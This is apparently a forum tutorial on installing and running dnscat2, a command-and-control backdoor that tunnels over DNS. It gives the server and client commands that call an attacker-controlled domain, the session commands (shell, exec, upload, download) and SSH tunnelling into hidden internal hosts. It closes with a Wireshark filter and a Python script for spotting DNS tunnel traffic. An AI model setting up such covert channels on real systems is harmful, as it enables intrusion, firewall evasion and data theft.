DNSCAT – Backdoor via DNS

dnscat2 is a program that creates a C&C (command and control) channel over DNS. It consists of a server part written in Ruby and a client part written in C. A command and control server is a computer controlled by an attacker that sends commands to the compromised machine.

Firewalls almost always let name resolution through as normal traffic, which is what makes this channel work. You can see an example scheme below:



Download and install:

Bash:

sudo apt-get update
sudo apt-get -y install ruby-dev git make g++
sudo gem install bundler
git clone https://github.com/iagox86/dnscat2.git

or, as a single line:

sudo apt-get update && sudo apt-get -y install ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git

Installing the server part:



cd dnscat2/server
bundle install

Installing the client part:

cd dnscat2/client
make

Some errors are described in the project repository (iagox86/dnscat2). If you run into an error that is not covered there, ask in this thread or google it.

Usage

Launch:

Server: sudo ruby dnscat2.rb

Client: run it on the remote machine.

Server

Code:

sudo ruby dnscat2.rb legitdnsserver.com

Client

Code:

./dnscat legitdnsserver.com

Attach to a dnscat2 session by its number:

Code:

sessions -i <session number>

Commands available inside a session:

clear
delay
download
echo
exec
help
listen
ping
quit
set
shell
shutdown
suspend
tunnels
unset
upload
window
windows

Tunnels

If you need convenient SSH access to machines on the remote local network, this is a very useful feature.

Select the session and enter the command:

listen <port> <dest ip>:<ssh port>

Now you can connect over ssh to a machine that is not visible from outside:

ssh -p <port> <user>@<dnscat2 server host>

By the way, dnscat2 enables encryption by default. The author says it does not guarantee 100% cryptographic strength, but there is some protection.

How to detect dnscat2 on a machine

Capture traffic with Wireshark and apply the following filter:

dns.qry.name.len > 16 and !mdns

16 is just a DNS query name length that I picked by hand; you may need a different number. To find it, look at what the filter returns.

Normal DNS queries may remain after this filter, so look for dnscat among them.

And in the packet details look for dnscat.
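As an added example, not part of the original article, the same two-stage check as a script over constructed query-log lines: the length and mDNS cut from the Wireshark filter first, then a look at the first label, since dnscat2 hex-encodes its data into the query name; the log format, thresholds and function names are assumptions.

```python
import math
import re
from collections import Counter
# Constructed sample "src qtype qname" lines (not from the page): three hex-encoded
# subdomains of the tunnel domain, two ordinary lookups, one mDNS query.
SAMPLE_LOG = """\
10.0.0.5 TXT 9a2b6e01c03f5d4ab7cc1e.legitdnsserver.com
10.0.0.5 CNAME d3b1f0a9e4c7725810ff33ab.legitdnsserver.com
10.0.0.7 A www.example.com
10.0.0.7 A mail.example.com
10.0.0.9 PTR _services._dns-sd._udp.local
10.0.0.5 MX 7c0e55aa19bd3e62f4.legitdnsserver.com
"""
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")  # dnscat2 hex-encodes its payload labels

def shannon_entropy(s):
    # bits per character; encoded data scores well above dictionary words
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def reasons_for(qname, min_len=16, entropy_cutoff=3.5):
    # why a query name looks like tunnel traffic; [] means it looks normal
    qname = qname.rstrip(".").lower()
    if qname.endswith(".local") or len(qname) <= min_len:
        return []  # same exclusions as "dns.qry.name.len > 16 and !mdns"
    first = qname.split(".")[0]
    reasons = []
    if HEX_LABEL.match(first):
        reasons.append("hex_label")
    if shannon_entropy(first) > entropy_cutoff:
        reasons.append("high_entropy")
    return reasons

def flag_queries(log_text):
    # returns (src, qname, reasons) for every suspicious query in the log
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and (reasons := reasons_for(m.group(3))):
            hits.append((m.group(1), m.group(3).rstrip(".").lower(), reasons))
    return hits

def tunnel_candidates(log_text, min_hits=2):
    # many flagged names under one domain (crudely: last two labels) from one client is the dnscat2 pattern
    counts = Counter()
    for src, qname, _ in flag_queries(log_text):
        counts[(src, ".".join(qname.split(".")[-2:]))] += 1
    return {k: v for k, v in counts.items() if v >= min_hits}
```

Run `tunnel_candidates(SAMPLE_LOG)` to get the (client, domain) pairs worth pulling a packet capture for.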


Utility links

https://github.com/iagox86/dnscat2 – dnscat2 project page with its documentation.

https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 – about detecting DNS tunnels.

P.S. I may have gone beyond the “Software” section at some points, but it was necessary to show the functionality. Thank you all for your attention.
